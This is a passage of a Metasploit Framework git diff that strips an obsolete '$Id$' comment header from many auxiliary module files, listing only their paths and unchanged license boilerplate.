commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index c2c241eba3..a9bda6ebd7 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/mssql/mssql_enum.rb b/modules/auxiliary/admin/mssql/mssql_enum.rb index b439673ef8..17d463a42a 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index 9c338000ec..4e7aec282f 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index 278fc84034..087981bcc2 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # Author: Robin Wood # Version: 0.1 diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 75697d4cff..72a7cf7c7f 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index abe182ae60..8ea749a4bd 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 539a2f89e4..a01bbb971f 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb index edc05e66b0..5125cd8a14 100644 --- a/modules/auxiliary/admin/officescan/tmlisten_traversal.rb +++ b/modules/auxiliary/admin/officescan/tmlisten_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb index d86eea29e6..28927e7882 100644 --- a/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb +++ b/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index 34d0111e52..9598de5e21 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 62904cb51a..3852d03504 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/oraenum.rb b/modules/auxiliary/admin/oracle/oraenum.rb index 52b78aba4e..54b213a34e 100644 --- a/modules/auxiliary/admin/oracle/oraenum.rb +++ b/modules/auxiliary/admin/oracle/oraenum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index e4bcae8907..933e5e9c42 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/osb_execqr2.rb b/modules/auxiliary/admin/oracle/osb_execqr2.rb index 89ee779b4f..f106592913 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr2.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/osb_execqr3.rb b/modules/auxiliary/admin/oracle/osb_execqr3.rb index 0dd1d8d660..7ae37abfe4 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr3.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr3.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb index 63056cf04b..b37214bb37 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb index 5c101fff3d..0ce84a4ef7 100644 --- a/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb +++ b/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/sid_brute.rb b/modules/auxiliary/admin/oracle/sid_brute.rb index 34e8440607..6fe1a92eb1 100644 --- a/modules/auxiliary/admin/oracle/sid_brute.rb +++ b/modules/auxiliary/admin/oracle/sid_brute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/oracle/tnscmd.rb b/modules/auxiliary/admin/oracle/tnscmd.rb index 191c19afa4..dfe404bda0 100644 --- a/modules/auxiliary/admin/oracle/tnscmd.rb +++ b/modules/auxiliary/admin/oracle/tnscmd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index ce5296b53d..dc889d58a1 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index bcccfa6b75..fd91946200 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index 5bb3894345..4b87f51d52 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb index 8538203de9..e57a7b4ffd 100644 --- a/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb +++ b/modules/auxiliary/admin/sap/sap_mgmt_con_osexec.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/scada/igss_exec_17.rb b/modules/auxiliary/admin/scada/igss_exec_17.rb index 00785bf316..da1752b1bd 100644 --- a/modules/auxiliary/admin/scada/igss_exec_17.rb +++ b/modules/auxiliary/admin/scada/igss_exec_17.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index 6d402b75c2..ca3f47ff6a 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 97c8706f73..a9f6ca1cb4 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index cea6e9d7a6..dfab1d09ca 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index 547f40f145..fad1557741 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index a661994fea..2a4a19c0ad 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb index 9b25f90db8..2890c10ef0 100644 --- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb +++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index b8b060f594..bb8b05a4de 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index 3dc28f3c2e..a6c5673815 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 02adc9de8a..4fa05fae59 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 15707975e5..dc9d56a43a 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index d3936bbd78..21f21b7887 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index 102bff1018..5c76847607 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index c951f00f91..7e9a4f1d92 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index 50bf6540ce..6bed0aed42 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index 061bec32f2..13e657574c 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 2168cc872e..7b279e8ae6 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index 7818eba7cb..059cfd1f12 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/admin/zend/java_bridge.rb b/modules/auxiliary/admin/zend/java_bridge.rb index 92ffde6302..7aaf0fcf6c 100644 --- a/modules/auxiliary/admin/zend/java_bridge.rb +++ b/modules/auxiliary/admin/zend/java_bridge.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/jtr_aix.rb b/modules/auxiliary/analyze/jtr_aix.rb index 326cb61f32..3e449a483e 100644 --- a/modules/auxiliary/analyze/jtr_aix.rb +++ b/modules/auxiliary/analyze/jtr_aix.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index adc2d86e4f..142d9989db 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/jtr_linux.rb b/modules/auxiliary/analyze/jtr_linux.rb index fab5b42940..3c05e61f2d 100644 --- a/modules/auxiliary/analyze/jtr_linux.rb +++ b/modules/auxiliary/analyze/jtr_linux.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/jtr_mssql_fast.rb b/modules/auxiliary/analyze/jtr_mssql_fast.rb index 556fc7ab93..8ccda07780 100644 --- a/modules/auxiliary/analyze/jtr_mssql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mssql_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index ab8a187178..ba90e3ad88 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/jtr_oracle_fast.rb b/modules/auxiliary/analyze/jtr_oracle_fast.rb index 3a9209ba81..f9d470eec1 100644 --- a/modules/auxiliary/analyze/jtr_oracle_fast.rb +++ b/modules/auxiliary/analyze/jtr_oracle_fast.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/jtr_unshadow.rb b/modules/auxiliary/analyze/jtr_unshadow.rb index d786d3f984..f1aab2136d 100644 --- a/modules/auxiliary/analyze/jtr_unshadow.rb +++ b/modules/auxiliary/analyze/jtr_unshadow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/analyze/postgres_md5_crack.rb b/modules/auxiliary/analyze/postgres_md5_crack.rb index fb1dd924c6..a8264c9bde 100644 --- a/modules/auxiliary/analyze/postgres_md5_crack.rb +++ b/modules/auxiliary/analyze/postgres_md5_crack.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/client/smtp/emailer.rb b/modules/auxiliary/client/smtp/emailer.rb index f8180e546d..6037570874 100644 --- a/modules/auxiliary/client/smtp/emailer.rb +++ b/modules/auxiliary/client/smtp/emailer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index 69ae191564..2441c65fb0 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb index c1645d52e9..d0a124e66e 100644 --- a/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb +++ b/modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index 5953a2c72e..edb57d6c1d 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/hp/data_protector_rds.rb b/modules/auxiliary/dos/hp/data_protector_rds.rb index f4f9ec8c43..066c66a0b1 100644 --- a/modules/auxiliary/dos/hp/data_protector_rds.rb +++ b/modules/auxiliary/dos/hp/data_protector_rds.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/http/3com_superstack_switch.rb b/modules/auxiliary/dos/http/3com_superstack_switch.rb index f9d95c1827..2230e7311b 100644 --- a/modules/auxiliary/dos/http/3com_superstack_switch.rb +++ b/modules/auxiliary/dos/http/3com_superstack_switch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/http/apache_mod_isapi.rb b/modules/auxiliary/dos/http/apache_mod_isapi.rb index c60138353b..86ac49772f 100644 --- a/modules/auxiliary/dos/http/apache_mod_isapi.rb +++ b/modules/auxiliary/dos/http/apache_mod_isapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/http/apache_range_dos.rb b/modules/auxiliary/dos/http/apache_range_dos.rb index 41f75be28a..8dff574e01 100644 --- a/modules/auxiliary/dos/http/apache_range_dos.rb +++ b/modules/auxiliary/dos/http/apache_range_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb index 02e1c7cc9b..989cad7ce4 100644 --- a/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb +++ b/modules/auxiliary/dos/http/apache_tomcat_transfer_encoding.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/http/dell_openmanage_post.rb b/modules/auxiliary/dos/http/dell_openmanage_post.rb index bebba2d291..9185f729e7 100644 --- a/modules/auxiliary/dos/http/dell_openmanage_post.rb +++ b/modules/auxiliary/dos/http/dell_openmanage_post.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb index 7cbe47c42a..4551950c08 100644 --- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb +++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index bbd0cd3fc8..cd1a70b018 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index 6c3ad96ca0..22070a0a88 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index a15751b505..e3a8f6181e 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index c45bc2aa67..ac92e69d86 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index da40a73201..5ce9593f14 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index 6c6419d06b..c02dde0451 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 66ac112ce2..df4c7ed467 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/dos/smtp/sendmail_prescan.rb b/modules/auxiliary/dos/smtp/sendmail_prescan.rb index 8e7407779d..14f3dacc54 100644 --- a/modules/auxiliary/dos/smtp/sendmail_prescan.rb +++ b/modules/auxiliary/dos/smtp/sendmail_prescan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git 